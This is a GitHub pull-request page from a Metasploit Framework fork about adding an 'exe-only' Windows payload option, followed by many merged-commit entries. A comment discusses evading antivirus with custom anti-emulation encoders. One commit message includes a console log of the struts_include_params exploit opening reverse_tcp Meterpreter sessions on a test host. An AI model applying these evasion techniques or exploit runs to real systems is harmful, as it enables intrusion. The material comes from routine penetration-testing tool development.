Exe only patch #1

Merged
merged 3 commits into from Mar 18, 2013

Conversation

Projects
None yet
3 participants

todb-r7 commented Mar 18, 2013

This fixes up the branch referenced by #904, so it no longer suffer from merge conflicts.

More importantly -- I'm not super comfortable about changing the default behavior of the VBS, ASP, and ASPX wrappers for the exe generators, mainly because I haven't seen anything compelling that says that these mechanisms should favor this new method.

When exe-small was introduced, these wrappers weren't updated to use them. Maybe it was an oversight, and maybe it was caution.

I think that kind of investigation should happen for sure, and then default behavior can get changed around. In the meantime, for people who want to use this payload type, they still can (as @rsmudge did in his examples).

So, tl;dr: more testing to prove that the AV evasion benefits are actually there, and more testing to prove that the wrappers aren't suddenly busted, if you please.

@todb-r7 todb-r7 referenced this pull request in rapid7/metasploit-framework Mar 18, 2013

Merged

added exe-only options to win32pe generation #904

0 of 4 tasks complete
Owner

agix commented Mar 18, 2013

Oh nice, thank you ! For testing, I use it with custom encoder with anti emulation tricks and I have no more problem with AV (even with shikata_ga_nai encoder). The detection is just related to the encoder/shellcode with this patch.
But the RWX section characteristics could be used to detect it even if I think it's a crazy detection condition (a lot of false positive...)
So I'm now scanning all the PE in C:\Windows\ looking for an RWX section... If I find one, AV couldn't use only this characteristic to catch Virus, because it would catch native windows binary too...

agix added a commit that referenced this pull request Mar 18, 2013

Merge pull request #1 from todb-r7/exe_only_patch
Exe only patch : avoid merge conflict and don't use win32pe_only everywhere by default.

@agix agix merged commit e3c5303 into agix:exe_only_patch Mar 18, 2013

agix pushed a commit that referenced this pull request Mar 27, 2013

agix pushed a commit that referenced this pull request Mar 27, 2013

agix pushed a commit that referenced this pull request Mar 27, 2013

Merge pull request #1 from jvazquez-r7/sonicwall_test
assuring stdapi loads on meterpreter

agix pushed a commit that referenced this pull request Mar 27, 2013

agix pushed a commit that referenced this pull request Mar 27, 2013

agix pushed a commit that referenced this pull request Mar 27, 2013

Merge pull request #1 from jvazquez-r7/persistence_vbs
using always a vbs file to drop exe

agix pushed a commit that referenced this pull request Mar 27, 2013

Merge pull request #1 from jvazquez-r7/devise_clean
This is all just formatting, ref additions, etc.  Nothing substantial so I'll just merge and test as I'm trying to figure out what's up with failing on @rvazquez-r7's app.

agix pushed a commit that referenced this pull request Mar 30, 2013

Merge pull request #1 from todb-r7/feature/loot-manipulation
Make it clear that you're deleting all loot

agix pushed a commit that referenced this pull request Mar 30, 2013

agix pushed a commit that referenced this pull request Mar 30, 2013

Merge pull request #1 from jvazquez-r7/injector_docx_post
testing completed. I see no issues with the proposed changes, tempfiles and quickfile work fine.

agix pushed a commit that referenced this pull request Mar 30, 2013

agix pushed a commit that referenced this pull request May 12, 2013

Merge pull request #1 from jvazquez-r7/nagios_nrpe_work
cleanup for nagios_nrpe_arguments

agix pushed a commit that referenced this pull request May 12, 2013

agix pushed a commit that referenced this pull request May 12, 2013

agix pushed a commit that referenced this pull request Jun 27, 2013

agix pushed a commit that referenced this pull request Jun 27, 2013

Merge pull request #1 from wchen-r7/pr1856_target_fix
Fix #1856 - Target selection and swf path

agix pushed a commit that referenced this pull request Jun 27, 2013

agix pushed a commit that referenced this pull request Jun 27, 2013

Fix issue with JAVA meterpreter failing to work.
Was down to the chunk length not being set correctly.
Still need to test against windows.

```
msf exploit(struts_include_params) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows Universal
   1   Linux Universal
   2   Java Universal

msf exploit(struts_include_params) > set target 1
target => 1
msf exploit(struts_include_params) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit

[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.0.1
[*] Meterpreter session 5 opened (192.168.0.2:4444 -> 192.168.0.1:38512) at 2013-05-30 10:37:54 +0100
[+] Deleted /tmp/57mN5N

meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Linux localhost.localdomain 2.6.32-358.2.1.el6.x86_64 #1 SMP Wed Mar 13 00:26:49 UTC 2013 (x86_64)
Architecture : x86_64
Meterpreter  : x86/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.0.1 - Meterpreter session 5 closed.  Reason: User exit
msf exploit(struts_include_params) > set target 2
target => 2
msf exploit(struts_include_params) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(struts_include_params) > exploit

[*] Started reverse handler on 192.168.0.2:4444
[*] Preparing payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending payload...
[*] Sending stage (30246 bytes) to 192.168.0.1
[*] Meterpreter session 6 opened (192.168.0.2:4444 -> 192.168.0.1:38513) at 2013-05-30 10:38:27 +0100
[!] This exploit may require manual cleanup of: z4kv.jar

meterpreter > sysinfo
Computer    : localhost.localdomain
OS          : Linux 2.6.32-358.2.1.el6.x86_64 (amd64)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...
```

agix pushed a commit that referenced this pull request Jun 27, 2013

Merge pull request #1 from jvazquez-r7/rfcode_work
Final cleanup for rfcode_reader_enum

agix pushed a commit that referenced this pull request Jun 27, 2013

agix pushed a commit that referenced this pull request Aug 20, 2013

Merge pull request #1 from jvazquez-r7/instantcms
Improve and clean instantcms_exec

agix pushed a commit that referenced this pull request Aug 20, 2013

agix pushed a commit that referenced this pull request Aug 20, 2013

Merge pull request #1 from CharlieEriksen/squash-rce
Adding Squash RCE exploit module

agix pushed a commit that referenced this pull request Sep 10, 2013

Merge pull request #1 from Meatballs1/pr/2270
Refactor and fixes

Added all of Meatball's awesome fixes.

agix pushed a commit that referenced this pull request Sep 10, 2013

agix pushed a commit that referenced this pull request Sep 19, 2013

agix pushed a commit that referenced this pull request Sep 19, 2013

agix pushed a commit that referenced this pull request Nov 17, 2013

agix pushed a commit that referenced this pull request Nov 17, 2013

Merge pull request #1 from jvennix-r7/locked_pref_panel_dry
Clean up timeout logic and update description

agix pushed a commit that referenced this pull request Nov 17, 2013

agix pushed a commit that referenced this pull request Nov 17, 2013

Merge pull request #1 from todb-r7/land-2414
Disambiguate tape_engine_8A as tape_engine_0x8a

agix pushed a commit that referenced this pull request Nov 17, 2013

agix pushed a commit that referenced this pull request Nov 17, 2013

agix pushed a commit that referenced this pull request Nov 17, 2013

agix pushed a commit that referenced this pull request Nov 17, 2013

agix pushed a commit that referenced this pull request Jan 6, 2014

agix pushed a commit that referenced this pull request Jan 6, 2014

Merge pull request #1 from jvazquez-r7/land_2711
Clean php_wordpress_optimizepress

agix pushed a commit that referenced this pull request Jan 6, 2014

agix pushed a commit that referenced this pull request Jan 6, 2014

agix pushed a commit that referenced this pull request Jan 6, 2014

Merge pull request #1 from wchen-r7/poison_ivy_ports_check
Add an input check for datastore option PORTS

agix pushed a commit that referenced this pull request Jan 6, 2014

agix pushed a commit that referenced this pull request Feb 4, 2014

agix pushed a commit that referenced this pull request Feb 4, 2014

agix pushed a commit that referenced this pull request Mar 6, 2014

Merge pull request #1 from tabassassin/retab/pr/2307
Retab/pr/2307 landed as requested.

agix pushed a commit that referenced this pull request Mar 6, 2014

agix pushed a commit that referenced this pull request Mar 6, 2014

Merge pull request #1 from jvazquez-r7/review-2801
Review IBM Lotus Sametime modules

agix pushed a commit that referenced this pull request Apr 13, 2014

staaldraad
Merge pull request #1 from Meatballs1/pr2107
Refactor to common post module

agix pushed a commit that referenced this pull request Apr 23, 2014

agix pushed a commit that referenced this pull request Apr 23, 2014

agix pushed a commit that referenced this pull request Sep 12, 2014

agix pushed a commit that referenced this pull request Sep 12, 2014

Merge pull request #1 from todb-r7/fix-pr3570
Revert "change to .gitignore"

agix pushed a commit that referenced this pull request Sep 12, 2014

agix pushed a commit that referenced this pull request Sep 12, 2014

agix pushed a commit that referenced this pull request Sep 12, 2014

agix pushed a commit that referenced this pull request Sep 12, 2014

Merge pull request #1 from rapid7/master
I wonder if this PR will work.

agix pushed a commit that referenced this pull request Sep 29, 2014

agix pushed a commit that referenced this pull request Nov 3, 2014

Merge pull request #1 from jhart-r7/landing-3992-jhart-fixes
Refactor hp_enum_perfd for better looting

agix pushed a commit that referenced this pull request Nov 3, 2014

Merge pull request #1 from jhart-r7/landing-4004-jhart
Refactoring of LastPass post module

agix pushed a commit that referenced this pull request Nov 3, 2014

Merge pull request #1 from zeroSteiner/fix-pr4020-login
Retry the script page request to get the token

agix pushed a commit that referenced this pull request Nov 3, 2014

Merge pull request #1 from jhart-r7/landing-4003-jhart
Cleanup.  Sanity check in setup.  vprint

agix pushed a commit that referenced this pull request Jan 5, 2015

Merge pull request #1 from jhart-r7/landing-4229-jhart
Minor Ruby style and module usability cleanup

agix pushed a commit that referenced this pull request Jan 5, 2015

rwhitcroft
Merge pull request #1 from hmoore-r7/smtp_ntlm_domain
Module cleanup, error handling, and reporting

agix pushed a commit that referenced this pull request Jan 5, 2015

Merge pull request #1 from jhart-r7/landing-4265-jhart
This is a great intermediate approach, thanks @jhart-r7 ! Will verify Pro and msfconsole cases momentarily.

agix pushed a commit that referenced this pull request Jan 5, 2015

agix pushed a commit that referenced this pull request Jan 5, 2015

Merge pull request #1 from jvazquez-r7/update_3305
Make Cisco SSL VPN Privilege Escalation landable

agix pushed a commit that referenced this pull request Jan 5, 2015

Merge pull request #1 from jhart-r7/landing-4328
Minor improvements to actual analyzer ant cookie exploit

agix pushed a commit that referenced this pull request Jan 5, 2015

Merge pull request #1 from wvu-r7/pr/4361
Merging changes. Thanks for all the help!

agix pushed a commit that referenced this pull request Jun 29, 2016

agix pushed a commit that referenced this pull request Jun 29, 2016

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment